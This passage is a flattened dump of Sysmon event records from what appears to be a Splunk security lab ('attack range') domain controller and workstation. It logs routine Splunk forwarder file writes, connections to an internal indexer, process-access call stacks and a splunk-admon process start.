Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FE1FFB255CC5427C409835B4670AEEF,SHA256=4B22DBAE2F16D2DD484C5B616B291D7C2CFE76779F1D99C5605FF07D1967D028,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:35.396{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4B8644C0C8EBBB770477441994BEEE7,SHA256=E5463DFFA400CAB65809DD37174347EF178F68345E20C8DCE657EE9B3D7961D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:36.599{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BDCE6B12E88614053BE80EC909A0347,SHA256=585DE17B4A6E7EFC915B4E241F9EB951D14FC692FCD0C2F130CBD3C77AA1F173,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:33.674{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49704-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000223916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:33.634{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51821-false10.0.1.12-8000- 23542300x8000000000000000223918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:37.834{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C783B596FE4C6DA19CB02660D9EB6F04,SHA256=C0036E2CFF6A20C4DAEF5F76F94BD9FD6D236F6F1F32F55DD7D37A20D24D7877,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:37.675{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=BEBB1BCE184E1837A845E1E16C00E11D,SHA256=5054A1822EA17067BCAA5B6F48E76D5D3A78F3039A7FBBE84816C308AF8C35D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:37.675{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:37.012{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B682CFE9ABB1A7E8AAF218BA109DC22,SHA256=380459A3EDE45D5739E58046B93BAE5C12DF8A36F902502D06F22A53BCF7D0E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:38.882{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE4766EEABABF2DB7CBD15213C9624CD,SHA256=B554538561C47EB54C46C13CE41ABC3906D0ED98DDDBA6F8663A5C90A764FF67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:38.062{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45FAFF661460F5F5C8F72448D36BBD21,SHA256=EBC8AD3B4D6B6A42A3C2214A7DD1C83B591BB17E0EDF945CCE41DA37E7C9373B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:39.960{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6974994A6331E66F129C452A96CBD86,SHA256=D007AE3A12929905F1C6D2DAE6CC252F9F30250D55D8B1A59563AEB879D87199,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:39.078{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0FDA3B0943F1037D056DD67917D5A58,SHA256=647F4AC2EF81E5044A5E04A89ABF34911FC8D1878D32B5D807E7E753E82EB6F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:40.861{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:40.093{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A6748B4361938949DF4923702D28FCA,SHA256=19DFCF28F186F7A4E2A6F5693C9C78379F92D22E89AF892A660332C9B4BE745D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:41.113{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8A8CDB0E79694D0519BFBDC83E560DF,SHA256=21A9A61103E35D96513F20CB99A4D935A2E47D65B5BE1E55A9FE9811F56DF285,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:41.180{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E5F6B76CB58D5FEDA00A3555655D55D,SHA256=0E3DA73E04003BBED137F1C86D0E5752554BFED43A7A1249869C8CFBAB8C605F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:39.466{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51822-false10.0.1.12-8000- 23542300x8000000000000000223922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:42.180{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD15B11E55E3B2D4089E8F8A23445827,SHA256=7C7C8F81E6CDC3F795B937FC5D92EB1DD7A46E7348DE8EC2965F743AD9831C04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:42.644{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=6C70BCD0CE951A322147F7A2B1147FE8,SHA256=408D64CF379AFA2DD299E29130E65D9724985CBA8893FAD867B65544F6EB7934,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:39.651{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49705-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:42.145{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FE23050B4F06C5314FDB2673AEAF17E,SHA256=089C43E49EE4B7D7EBAA256023297F8A6CB9C7733D31AB9C92B89FB49EE3D2DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:43.399{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A30ECE08C174D372D02D33872ECB7D5F,SHA256=E9CE614895308B5F51542E30AC1287B655B225C15F773F377CD73B236399D722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:43.191{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=389A171C630781310F422C1F4B3C2218,SHA256=626ED924F280891CF741E3F8052173F4430FD9B187B923AD28BE353429E0E512,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:40.304{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49706-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 10341000x8000000000000000223952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.931{4F8D34B0-1B20-6216-7905-000000003902}9764036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B20-6216-7905-000000003902}976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1B20-6216-7905-000000003902}976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.712{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B20-6216-7905-000000003902}976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.713{4F8D34B0-1B20-6216-7905-000000003902}976C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 